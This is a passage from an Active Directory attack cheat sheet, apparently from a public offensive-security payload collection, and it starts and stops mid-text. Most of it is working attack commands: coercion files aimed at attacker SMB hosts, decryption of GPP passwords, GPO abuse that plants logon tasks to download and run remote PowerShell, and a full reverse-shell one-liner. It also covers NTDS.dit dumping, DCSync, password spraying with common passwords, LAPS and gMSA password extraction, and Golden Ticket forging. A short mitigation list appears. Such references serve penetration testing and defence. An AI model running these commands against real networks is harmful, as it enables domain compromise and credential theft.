NAME=WORK SERVER=IP_RESPONDER #scf -crackmapexec smb 10.10.10.10 -u username -p password -M slinky -o NAME=WORK SERVER=IP_RESPONDER #lnk -crackmapexec smb 10.10.10.10 -u username -p password -M slinky -o NAME=WORK SERVER=IP_RESPONDER CLEANUP -``` - -### URL Files - -This attack also works with `.url` files and `responder -I eth0 -v`. - -```powershell -[InternetShortcut] -URL=whatever -WorkingDirectory=whatever -IconFile=\\10.10.10.10\%USERNAME%.icon -IconIndex=1 -``` - -### Windows Library Files - -> Windows Library Files (.library-ms) - -```xml - - - @windows.storage.dll,-34582 - 6 - true - imageres.dll,-1003 - - {7d49d726-3c21-4f05-99aa-fdc2c9474656} - - - - true - false - - \\\\workstation@8888\\folder - - - - -``` - -### Windows Search Connectors Files - -> Windows Search Connectors (.searchConnector-ms) - -```xml - - - imageres.dll,-1002 - Microsoft Outlook - false - true - \\\\workstation@8888\\folder.ico - - {91475FE5-586B-4EBA-8D75-D17434B8CDF6} - - - \\\\workstation@8888\\folder - - -``` - - -## Passwords in SYSVOL & Group Policy Preferences - -Find password in SYSVOL (MS14-025). SYSVOL is the domain-wide share in Active Directory to which all authenticated users have read access. All domain Group Policies are stored here: `\\\SYSVOL\\Policies\`. - -```powershell -findstr /S /I cpassword \\\sysvol\\policies\*.xml -``` - -Decrypt a Group Policy Password found in SYSVOL (by [0x00C651E0](https://twitter.com/0x00C651E0/status/956362334682849280)), using the 32-byte AES key provided by Microsoft in the [MSDN - 2.2.1.1.4 Password Encryption](https://msdn.microsoft.com/en-us/library/cc422924.aspx) - -```bash -echo 'password_in_base64' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000 - -e.g: -echo '5OPdEKwZSf7dYAvLOe6RzRDtcvT/wCP8g5RqmAgjSso=' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000 - -echo 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000 -``` - -### Automate the SYSVOL and passwords research - -* `Metasploit` modules to enumerate shares and credentials - ```c - scanner/smb/smb_enumshares - post/windows/gather/enum_shares - post/windows/gather/credentials/gpp - ``` - -* CrackMapExec modules - ```powershell - cme smb 10.10.10.10 -u Administrator -H 89[...]9d -M gpp_autologin - cme smb 10.10.10.10 -u Administrator -H 89[...]9d -M gpp_password - ``` - -* [Get-GPPPassword](https://github.com/SecureAuthCorp/impacket/blob/master/examples/Get-GPPPassword.py) - ```powershell - # with a NULL session - Get-GPPPassword.py -no-pass 'DOMAIN_CONTROLLER' - - # with cleartext credentials - Get-GPPPassword.py 'DOMAIN'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER' - - # pass-the-hash - Get-GPPPassword.py -hashes 'LMhash':'NThash' 'DOMAIN'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER' - ``` - -### Mitigations - -* Install [KB2962486](https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2014/ms14-025) on every computer used to manage GPOs which prevents new credentials from being placed in Group Policy Preferences. -* Delete existing GPP xml files in SYSVOL containing passwords. -* Don’t put passwords in files that are accessible by all authenticated users. - -## Exploit Group Policy Objects GPO - -> Creators of a GPO are automatically granted explicit Edit settings, delete, modify security, which manifests as CreateChild, DeleteChild, Self, WriteProperty, DeleteTree, Delete, GenericRead, WriteDacl, WriteOwner - -:triangular_flag_on_post: GPO Priorization : Organization Unit > Domain > Site > Local - -GPO are stored in the DC in `\\\SYSVOL\\Policies\\`, inside two folders **User** and **Machine**. -If you have the right to edit the GPO you can connect to the DC and replace the files. Planned Tasks are located at `Machine\Preferences\ScheduledTasks`. - -:warning: Domain members refresh group policy settings every 90 minutes with a random offset of 0 to 30 minutes but it can locally be forced with the following command: `gpupdate /force`. - -### Find vulnerable GPO - -Look a GPLink where you have the **Write** right. - -```powershell -Get-DomainObjectAcl -Identity "SuperSecureGPO" -ResolveGUIDs | Where-Object {($_.ActiveDirectoryRights.ToString() -match "GenericWrite|AllExtendedWrite|WriteDacl|WriteProperty|WriteMember|GenericAll|WriteOwner")} -``` - -### Abuse GPO with SharpGPOAbuse - -```powershell -# Build and configure SharpGPOAbuse -$ git clone https://github.com/FSecureLABS/SharpGPOAbuse -$ Install-Package CommandLineParser -Version 1.9.3.15 -$ ILMerge.exe /out:C:\SharpGPOAbuse.exe C:\Release\SharpGPOAbuse.exe C:\Release\CommandLine.dll - -# Adding User Rights -.\SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --UserAccount bob.smith --GPOName "Vulnerable GPO" - -# Adding a Local Admin -.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount bob.smith --GPOName "Vulnerable GPO" - -# Configuring a User or Computer Logon Script -.\SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContents "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO" - -# Configuring a Computer or User Immediate Task -# /!\ Intended to "run once" per GPO refresh, not run once per system -.\SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO" -.\SharpGPOAbuse.exe --AddComputerTask --GPOName "VULNERABLE_GPO" --Author 'LAB.LOCAL\User' --TaskName "EvilTask" --Arguments "/c powershell.exe -nop -w hidden -enc BASE64_ENCODED_COMMAND " --Command "cmd.exe" --Force -``` - -### Abuse GPO with PowerGPOAbuse - -* https://github.com/rootSySdk/PowerGPOAbuse - -```ps1 -PS> . .\PowerGPOAbuse.ps1 - -# Adding a localadmin -PS> Add-LocalAdmin -Identity 'Bobby' -GPOIdentity 'SuperSecureGPO' - -# Assign a new right -PS> Add-UserRights -Rights "SeLoadDriverPrivilege","SeDebugPrivilege" -Identity 'Bobby' -GPOIdentity 'SuperSecureGPO' - -# Adding a New Computer/User script -PS> Add-ComputerScript/Add-UserScript -ScriptName 'EvilScript' -ScriptContent $(Get-Content evil.ps1) -GPOIdentity 'SuperSecureGPO' - -# Create an immediate task -PS> Add-GPOImmediateTask -TaskName 'eviltask' -Command 'powershell.exe /c' -CommandArguments "'$(Get-Content evil.ps1)'" -Author Administrator -Scope Computer/User -GPOIdentity 'SuperSecureGPO' -``` - -### Abuse GPO with pyGPOAbuse - -```powershell -$ git clone https://github.com/Hackndo/pyGPOAbuse - -# Add john user to local administrators group (Password: H4x00r123..) -./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" - -# Reverse shell example -./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" \ - -powershell \ - -command "\$client = New-Object System.Net.Sockets.TCPClient('10.20.0.2',1234);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" \ - -taskname "Completely Legit Task" \ - -description "Dis is legit, pliz no delete" \ - -user -``` - -### Abuse GPO with PowerView - -```powershell -# Enumerate GPO -Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} - -# New-GPOImmediateTask to push an Empire stager out to machines via VulnGPO -New-GPOImmediateTask -TaskName Debugging -GPODisplayName VulnGPO -CommandArguments '-NoP -NonI -W Hidden -Enc AAAAAAA...' -Force -``` - -### Abuse GPO with StandIn - -```powershell -# Add a local administrator -StandIn.exe --gpo --filter Shards --localadmin user002 - -# Set custom right to a user -StandIn.exe --gpo --filter Shards --setuserrights user002 --grant "SeDebugPrivilege,SeLoadDriverPrivilege" - -# Execute a custom command -StandIn.exe --gpo --filter Shards --tasktype computer --taskname Liber --author "REDHOOK\Administrator" --command "C:\I\do\the\thing.exe" --args "with args" -``` - -## Dumping AD Domain Credentials - -You will need the following files to extract the ntds : -- NTDS.dit file -- SYSTEM hive (`C:\Windows\System32\SYSTEM`) - -Usually you can find the ntds in two locations : `systemroot\NTDS\ntds.dit` and `systemroot\System32\ntds.dit`. -- `systemroot\NTDS\ntds.dit` stores the database that is in use on a domain controller. It contains the values for the domain and a replica of the values for the forest (the Configuration container data). -- `systemroot\System32\ntds.dit` is the distribution copy of the default directory that is used when you install Active Directory on a server running Windows Server 2003 or later to create a domain controller. Because this file is available, you can run the Active Directory Installation Wizard without having to use the server operating system CD. - -However you can change the location to a custom one, you will need to query the registry to get the current location. - -```powershell -reg query HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters /v "DSA Database file" -``` - -### Using ndtsutil - -```powershell -C:\>ntdsutil -ntdsutil: activate instance ntds -ntdsutil: ifm -ifm: create full c:\pentest -ifm: quit -ntdsutil: quit -``` - -or - -```powershell -ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q -``` - -### Using Vshadow - -```powershell -vssadmin create shadow /for=C : -Copy Shadow_Copy_Volume_Name\windows\ntds\ntds.dit c:\ntds.dit -``` - -You can also use the Nishang script, available at : [https://github.com/samratashok/nishang](https://github.com/samratashok/nishang) - -```powershell -Import-Module .\Copy-VSS.ps1 -Copy-VSS -Copy-VSS -DestinationDir C:\ShadowCopy\ -``` - -### Using vssadmin - -```powershell -vssadmin create shadow /for=C: -copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy -copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\ShadowCopy -``` - -### Using DiskShadow (a Windows signed binary) - -```powershell -diskshadow.txt contains : -set context persistent nowriters -add volume c: alias someAlias -create -expose %someAlias% z: -exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit -delete shadows volume %someAlias% -reset - -then: -NOTE - must be executed from C:\Windows\System32 -diskshadow.exe /s c:\diskshadow.txt -dir c:\exfil -reg.exe save hklm\system c:\exfil\system.bak -``` - -### Using esentutl.exe - -Copy/extract a locked file such as the AD Database - -```powershell -esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit -``` - -### Extract hashes from ntds.dit - -then you need to use [secretsdump](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py) to extract the hashes, use the `LOCAL` options to use it on a retrieved ntds.dit - -```java -secretsdump.py -system /root/SYSTEM -ntds /root/ntds.dit LOCAL -``` - -[secretsdump](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py) also works remotely - -```java -./secretsdump.py -dc-ip IP AD\administrator@domain -use-vss -pwd-last-set -user-status -./secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@10.0.0.1 -``` - -* `-pwd-last-set`: Shows pwdLastSet attribute for each NTDS.DIT account. -* `-user-status`: Display whether or not the user is disabled. - -### Alternatives - modules - -Metasploit modules - -```c -windows/gather/credentials/domain_hashdump -``` - -PowerSploit module - -```powershell -Invoke-NinjaCopy --path c:\windows\NTDS\ntds.dit --verbose --localdestination c:\ntds.dit -``` - -CrackMapExec module - -```powershell -cme smb 10.10.0.202 -u username -p password --ntds vss -cme smb 10.10.0.202 -u username -p password --ntds drsuapi #default -``` - -### Using Mimikatz DCSync - -Any member of Administrators, Domain Admins, or Enterprise Admins as well as Domain Controller computer accounts are able to run DCSync to pull password data. - -```powershell -# DCSync only one user -mimikatz# lsadump::dcsync /domain:htb.local /user:krbtgt - -# DCSync all users of the domain -mimikatz# lsadump::dcsync /domain:htb.local /all /csv -``` - -:warning: Read-Only Domain Controllers are not allowed to pull password data for users by default. - -### Using Mimikatz sekurlsa - -Dumps credential data in an Active Directory domain when run on a Domain Controller. -:warning: Requires administrator access with debug or Local SYSTEM rights - -```powershell -sekurlsa::krbtgt -lsadump::lsa /inject /name:krbtgt -``` - -### Crack NTLM hashes with hashcat - -Useful when you want to have the clear text password or when you need to make stats about weak passwords. - -Recommended wordlists: -- [Rockyou.txt](https://weakpass.com/wordlist/90) -- [Have I Been Pwned founds](https://hashmob.net/hashlists/info/4169-Have%20I%20been%20Pwned%20V8%20(NTLM)) -- [Weakpass.com](https://weakpass.com/) -- Read More at [Methodology and Resources/Hash Cracking.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Hash%20Cracking.md) - -```powershell -# Basic wordlist -# (-O) will Optimize for 32 characters or less passwords -# (-w 4) will set the workload to "Insane" -$ hashcat64.exe -m 1000 -w 4 -O -a 0 -o pathtopotfile pathtohashes pathtodico -r myrules.rule --opencl-device-types 1,2 - -# Generate a custom mask based on a wordlist -$ git clone https://github.com/iphelix/pack/blob/master/README -$ python2 statsgen.py ../hashcat.potfile -o hashcat.mask -$ python2 maskgen.py hashcat.mask --targettime 3600 --optindex -q -o hashcat_1H.hcmask -``` - -:warning: If the password is not a confidential data (challenges/ctf), you can use online "cracker" like : -- [hashmob.net](https://hashmob.net) -- [crackstation.net](https://crackstation.net) -- [hashes.com](https://hashes.com/en/decrypt/hash) - - -### NTDS Reversible Encryption - -`UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED` ([0x00000080](http://www.selfadsi.org/ads-attributes/user-userAccountControl.htm)), if this bit is set, the password for this user stored encrypted in the directory - but in a reversible form. - -The key used to both encrypt and decrypt is the SYSKEY, which is stored in the registry and can be extracted by a domain admin. -This means the hashes can be trivially reversed to the cleartext values, hence the term “reversible encryption”. - -* List users with "Store passwords using reversible encryption" enabled - ```powershell - Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl - ``` - -The password retrieval is already handled by [SecureAuthCorp/secretsdump.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py) and mimikatz, it will be displayed as CLEARTEXT. - - -## User Hunting - -Sometimes you need to find a machine where a specific user is logged in. -You can remotely query every machines on the network to get a list of the users's sessions. - -* CrackMapExec - ```ps1 - cme smb 10.10.10.0/24 -u Administrator -p 'P@ssw0rd' --sessions - SMB 10.10.10.10 445 WIN-8OJFTLMU1IG [+] Enumerated sessions - SMB 10.10.10.10 445 WIN-8OJFTLMU1IG \\10.10.10.10 User:Administrator - ``` -* Impacket Smbclient - ```ps1 - $ impacket-smbclient Administrator@10.10.10.10 - # who - host: \\10.10.10.10, user: Administrator, active: 1, idle: 0 - ``` -* PowerView Invoke-UserHunter - ```ps1 - # Find computers were a Domain Admin OR a specified user has a session - Invoke-UserHunter - Invoke-UserHunter -GroupName "RDPUsers" - Invoke-UserHunter -Stealth - ``` - - -## Password spraying - -Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password. - -> The builtin Administrator account (RID:500) cannot be locked out of the system no matter how many failed logon attempts it accumulates. - -Most of the time the best passwords to spray are : - -- `P@ssw0rd01`, `Password123`, `Password1`, `Hello123`, `mimikatz` -- `Welcome1`/`Welcome01` -- $Companyname1 :`$Microsoft1` -- SeasonYear : `Winter2019*`, `Spring2020!`, `Summer2018?`, `Summer2020`, `July2020!` -- Default AD password with simple mutations such as number-1, special character iteration (*,?,!,#) -- Empty Password (Hash:31d6cfe0d16ae931b73c59d7e0c089c0) - - -### Kerberos pre-auth bruteforcing - -Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing. - -> Kerberos pre-authentication errors are not logged in Active Directory with a normal **Logon failure event (4625)**, but rather with specific logs to **Kerberos pre-authentication failure (4771)**. - -* Username bruteforce - ```powershell - root@kali:~$ ./kerbrute_linux_amd64 userenum -d domain.local --dc 10.10.10.10 usernames.txt - ``` -* Password bruteforce - ```powershell - root@kali:~$ ./kerbrute_linux_amd64 bruteuser -d domain.local --dc 10.10.10.10 rockyou.txt username - ``` -* Password spray - ```powershell - root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt Password123 - root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt rockyou.txt - root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt '123456' -v --delay 100 -o kerbrute-passwordspray-123456.log - ``` - -### Spray a pre-generated passwords list - -* Using `crackmapexec` and `mp64` to generate passwords and spray them against SMB services on the network. - ```powershell - crackmapexec smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)` - ``` -* Using `DomainPasswordSpray` to spray a password against all users of a domain. - ```powershell - # https://github.com/dafthack/DomainPasswordSpray - Invoke-DomainPasswordSpray -Password Summer2021! - # /!\ be careful with the account lockout ! - Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt - ``` -* Using `SMBAutoBrute`. - ```powershell - Invoke-SMBAutoBrute -UserList "C:\ProgramData\admins.txt" -PasswordList "Password1, Welcome1, 1qazXDR%+" -LockoutThreshold 5 -ShowVerbose - ``` - -### Spray passwords against the RDP service - -* Using [RDPassSpray](https://github.com/xFreed0m/RDPassSpray) to target RDP services. - ```powershell - git clone https://github.com/xFreed0m/RDPassSpray - python3 RDPassSpray.py -u [USERNAME] -p [PASSWORD] -d [DOMAIN] -t [TARGET IP] - ``` -* Using [hydra](https://github.com/vanhauser-thc/thc-hydra) and [ncrack](https://github.com/nmap/ncrack) to target RDP services. - ```powershell - hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://10.10.10.10 - ncrack –connection-limit 1 -vv --user administrator -P password-file.txt rdp://10.10.10.10 - ``` - -### BadPwdCount attribute - -> The number of times the user tried to log on to the account using an incorrect password. A value of 0 indicates that the value is unknown. - -```powershell -$ crackmapexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --users -LDAP 10.0.2.11 389 dc01 Guest badpwdcount: 0 pwdLastSet: -LDAP 10.0.2.11 389 dc01 krbtgt badpwdcount: 0 pwdLastSet: -``` - - -## Password in AD User comment - -```powershell -$ crackmapexec ldap domain.lab -u 'username' -p 'password' -M user-desc -$ crackmapexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 -M get-desc-users -GET-DESC... 10.0.2.11 389 dc01 [+] Found following users: -GET-DESC... 10.0.2.11 389 dc01 User: Guest description: Built-in account for guest access to the computer/domain -GET-DESC... 10.0.2.11 389 dc01 User: krbtgt description: Key Distribution Center Service Account -``` - -There are 3-4 fields that seem to be common in most AD schemas: `UserPassword`, `UnixUserPassword`, `unicodePwd` and `msSFU30Password`. - -```powershell -enum4linux | grep -i desc - -Get-WmiObject -Class Win32_UserAccount -Filter "Domain='COMPANYDOMAIN' AND Disabled='False'" | Select Name, Domain, Status, LocalAccount, AccountType, Lockout, PasswordRequired,PasswordChangeable, Description, SID -``` - -or dump the Active Directory and `grep` the content. - -```powershell -ldapdomaindump -u 'DOMAIN\john' -p MyP@ssW0rd 10.10.10.10 -o ~/Documents/AD_DUMP/ -``` - - -## Password of Pre-Created Computer Account - -When `Assign this computer account as a pre-Windows 2000 computer` checkmark is checked, the password for the computer account becomes the same as the computer account in lowercase. For instance, the computer account **SERVERDEMO$** would have the password **serverdemo**. - -```ps1 -# Create a machine with default password -# must be run from a domain joined device connected to the domain -djoin /PROVISION /DOMAIN /MACHINE evilpc /SAVEFILE C:\temp\evilpc.txt /DEFPWD /PRINTBLOB /NETBIOS evilpc -``` - -* When you attempt to login using the credential you should have the following error code : `STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT`. -* Then you need to change the password with [rpcchangepwd.py](https://github.com/SecureAuthCorp/impacket/pull/1304) - - -## Reading LAPS Password - -> Use LAPS to automatically manage local administrator passwords on domain joined computers so that passwords are unique on each managed computer, randomly generated, and securely stored in Active Directory infrastructure. - -### Determine if LAPS is installed - -```ps1 -Get-ChildItem 'c:\program files\LAPS\CSE\Admpwd.dll' -Get-FileHash 'c:\program files\LAPS\CSE\Admpwd.dll' -Get-AuthenticodeSignature 'c:\program files\LAPS\CSE\Admpwd.dll' -``` - -### Extract LAPS password - -> The "ms-mcs-AdmPwd" a "confidential" computer attribute that stores the clear-text LAPS password. Confidential attributes can only be viewed by Domain Admins by default, and unlike other attributes, is not accessible by Authenticated Users - - - From Windows: - - * adsisearcher (native binary on Windows 8+) - ```powershell - ([adsisearcher]"(&(objectCategory=computer)(ms-MCS-AdmPwd=*)(sAMAccountName=*))").findAll() | ForEach-Object { $_.properties} - ([adsisearcher]"(&(objectCategory=computer)(ms-MCS-AdmPwd=*)(sAMAccountName=MACHINE$))").findAll() | ForEach-Object { $_.properties} - ``` - - * [PowerView](https://github.com/PowerShellEmpire/PowerTools) - ```powershell - PS > Import-Module .\PowerView.ps1 - PS > Get-DomainComputer COMPUTER -Properties ms-mcs-AdmPwd,ComputerName,ms-mcs-AdmPwdExpirationTime - ``` - - * [LAPSToolkit](https://github.com/leoloobeek/LAPSToolkit) - ```powershell - $ Get-LAPSComputers - ComputerName Password Expiration - ------------ -------- ---------- - example.domain.local dbZu7;vGaI)Y6w1L 02/21/2021 22:29:18 - - $ Find-LAPSDelegatedGroups - $ Find-AdmPwdExtendedRights - ``` - - * Powershell AdmPwd.PS - ```powershell - foreach ($objResult in $colResults){$objComputer = $objResult.Properties; $objComputer.name|where {$objcomputer.name -ne $env:computername}|%{foreach-object {Get-AdmPwdPassword -ComputerName $_}}} - ``` - - - From Linux: - - * [pyLAPS](https://github.com/p0dalirius/pyLAPS) to **read** and **write** LAPS passwords: - ```bash - # Read the password of all computers - ./pyLAPS.py --action get -u 'Administrator' -d 'LAB.local' -p 'Admin123!' --dc-ip 192.168.2.1 - # Write a random password to a specific computer - ./pyLAPS.py --action set --computer 'PC01$' -u 'Administrator' -d 'LAB.local' -p 'Admin123!' --dc-ip 192.168.2.1 - ``` - - * [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec): - ```bash - crackmapexec smb 10.10.10.10 -u 'user' -H '8846f7eaee8fb117ad06bdd830b7586c' -M laps - ``` - - * [LAPSDumper](https://github.com/n00py/LAPSDumper) - ```bash - python laps.py -u 'user' -p 'password' -d 'domain.local' - python laps.py -u 'user' -p 'e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c' -d 'domain.local' -l 'dc01.domain.local' - ``` - - * ldapsearch - ```bash - ldapsearch -x -h  -D "@" -w  -b "dc=<>,dc=<>,dc=<>" "(&(objectCategory=computer)(ms-MCS-AdmPwd=*))" ms-MCS-AdmPwd` - ``` - -### Grant LAPS Access -The members of the group **"Account Operator"** can add and modify all the non admin users and groups. Since **LAPS ADM** and **LAPS READ** are considered as non admin groups, it's possible to add an user to them, and read the LAPS admin password - -```ps1 -Add-DomainGroupMember -Identity 'LAPS ADM' -Members 'user1' -Credential $cred -Domain "domain.local" -Add-DomainGroupMember -Identity 'LAPS READ' -Members 'user1' -Credential $cred -Domain "domain.local" -``` - - -## Reading GMSA Password - -> User accounts created to be used as service accounts rarely have their password changed. Group Managed Service Accounts (GMSAs) provide a better approach (starting in the Windows 2012 timeframe). The password is managed by AD and automatically rotated every 30 days to a randomly generated password of 256 bytes. - -### GMSA Attributes in the Active Directory -* `msDS-GroupMSAMembership` (`PrincipalsAllowedToRetrieveManagedPassword`) - stores the security principals that can access the GMSA password. -* `msds-ManagedPassword` - This attribute contains a BLOB with password information for group-managed service accounts. -* `msDS-ManagedPasswordId` - This constructed attribute contains the key identifier for the current managed password data for a group MSA. -* `msDS-ManagedPasswordInterval` - This attribute is used to retrieve the number of days before a managed password is automatically changed for a group MSA. - - -### Extract NT hash from the Active Directory - -* [GMSAPasswordReader](https://github.com/rvazarkar/GMSAPasswordReader) (C#) - ```ps1 - # https://github.com/rvazarkar/GMSAPasswordReader - GMSAPasswordReader.exe --accountname SVC_SERVICE_ACCOUNT - ``` - -* [gMSADumper (Python)](https://github.com/micahvandeusen/gMSADumper) - ```powershell - # https://github.com/micahvandeusen/gMSADumper - python3 gMSADumper.py -u User -p Password1 -d domain.local - ``` - -* Active Directory Powershell - ```ps1 - $gmsa = Get-ADServiceAccount -Identity 'SVC_SERVICE_ACCOUNT' -Properties 'msDS-ManagedPassword' - $blob = $gmsa.'msDS-ManagedPassword' - $mp = ConvertFrom-ADManagedPasswordBlob $blob - $hash1 = ConvertTo-NTHash -Password $mp.SecureCurrentPassword - ``` - -* [gMSA_Permissions_Collection.ps1](https://gist.github.com/kdejoyce/f0b8f521c426d04740148d72f5ea3f6f#file-gmsa_permissions_collection-ps1) based on Active Directory PowerShell module - - -## Forging Golden GMSA - -> One notable difference between a **Golden Ticket** attack and the **Golden GMSA** attack is that they no way of rotating the KDS root key secret. Therefore, if a KDS root key is compromised, there is no way to protect the gMSAs associated with it. - -:warning: You can't "force reset" a gMSA password, because a gMSA's password never changes. The password is derived from the KDS root key and `ManagedPasswordIntervalInDays`, so every Domain Controller can at any time compute what the password is, what it used to be, and what it will be at any point in the future. - -* Using [GoldenGMSA](https://github.com/Semperis/GoldenGMSA) - ```ps1 - # Enumerate all gMSAs - GoldenGMSA.exe gmsainfo - # Query for a specific gMSA - GoldenGMSA.exe gmsainfo --sid S-1-5-21-1437000690-1664695696-1586295871-1112 - - # Dump all KDS Root Keys - GoldenGMSA.exe kdsinfo - # Dump a specific KDS Root Key - GoldenGMSA.exe kdsinfo --guid 46e5b8b9-ca57-01e6-e8b9-fbb267e4adeb - - # Compute gMSA password - # --sid : SID of the gMSA (required) - # --kdskey : Base64 encoded KDS Root Key - # --pwdid : Base64 of msds-ManagedPasswordID attribute value - GoldenGMSA.exe compute --sid S-1-5-21-1437000690-1664695696-1586295871-1112 # requires privileged access to the domain - GoldenGMSA.exe compute --sid S-1-5-21-1437000690-1664695696-1586295871-1112 --kdskey AQAAALm45UZXyuYB[...]G2/M= # requires LDAP access - GoldenGMSA.exe compute --sid S-1-5-21-1437000690-1664695696-1586295871-1112 --kdskey AQAAALm45U[...]SM0R7djG2/M= --pwdid AQAAA[..]AAA # Offline mode - ``` - -## Kerberos Tickets - -Tickets are used to grant access to network resources. A ticket is a data structure that contains information about the user's identity, the network service or resource being accessed, and the permissions or privileges associated with that resource. Kerberos tickets have a limited lifetime and expire after a set period of time, typically 8 to 12 hours. - -There are two types of tickets in Kerberos: - -* **Ticket Granting Ticket** (TGT): The TGT is obtained by the user during the initial authentication process. It is used to request additional service tickets without requiring the user to re-enter their credentials. The TGT contains the user's identity, a timestamp, and an encryption of the user's secret key. - -* **Service Ticket** (ST): The service ticket is used to access a specific network service or resource. The user presents the service ticket to the service or resource, which then uses the ticket to authenticate the user and grant access to the requested resource. The service ticket contains the user's identity, a timestamp, and an encryption of the service's secret key. - - -### Dump Kerberos Tickets - -* Mimikatz: `sekurlsa::tickets /export` -* Rubeus - ```ps1 - # List available tickets - Rubeus.exe triage - - # Dump one ticket, the output is in Kirbi format - Rubeus.exe dump /luid:0x12d1f7 - ``` - -### Replay Kerberos Tickets - -* Mimikatz: `mimikatz.exe "kerberos::ptc C:\temp\TGT_Administrator@lab.local.ccache"` -* CrackMapExec: `KRB5CCNAME=/tmp/administrator.ccache crackmapexec smb 10.10.10 -u user --use-kcache` - - -### Convert Kerberos Tickets - -In the Kerberos authentication protocol, ccache and kirbi are two types of Kerberos credential caches that are used to store Kerberos tickets. - -* A credential cache, or `"ccache"` is a temporary storage area for Kerberos tickets that are obtained during the authentication process. The ccache contains the user's authentication credentials and is used to access network resources without having to re-enter the user's credentials for each request. - -* The Kerberos Integrated Windows Authentication (KIWA) protocol used by Microsoft Windows systems also makes use of a credential cache called a `"kirbi"` cache. The kirbi cache is similar to the ccache used by standard Kerberos implementations, but with some differences in the way it is structured and managed. - -While both caches serve the same basic purpose of storing Kerberos tickets to enable efficient access to network resources, they differ in format and structure. You can convert them easily using: - -* kekeo: `misc::convert ccache ticket.kirbi` -* impacket: `impacket-ticketConverter SRV01.kirbi SRV01.ccache` - - -### Pass-the-Ticket Golden Tickets - -Forging a TGT require: -* the `krbtgt` NT hash -* since recently, we cannot use a non-existent account name as a result of `CVE-2021-42287` mitigations - -> The way to forge a Golden Ticket is very similar to the Silver Ticket one. The main differences are that, in this case, no service SPN must be specified to ticketer.py, and the krbtgt NT hash must be used. - -#### Using Mimikatz - -```powershell -# Get info - Mimikatz -lsadump::lsa /inject /name:krbtgt -lsadump::lsa /patch -lsadump::trust /patch -lsadump::dcsync /user:krbtgt - -# Forge a Golden ticket - Mimikatz -kerberos::purge -kerberos::golden /user:evil /domain:pentestlab.local /sid:S-1-5-21-3737340914-2019594255-2413685307 /krbtgt:d125e4f69c851529045ec95ca80fa37e /ticket:evil.tck /ptt -kerberos::tgt -``` - -#### Using Meterpreter - -```powershell -# Get info - Meterpreter(kiwi) -dcsync_ntlm krbtgt -dcsync krbtgt - -# Forge a Golden ticket - Meterpreter -load kiwi -golden_ticket_create -d -k -s -u -t -golden_ticket_create -d pentestlab.local -u pentestlabuser -s 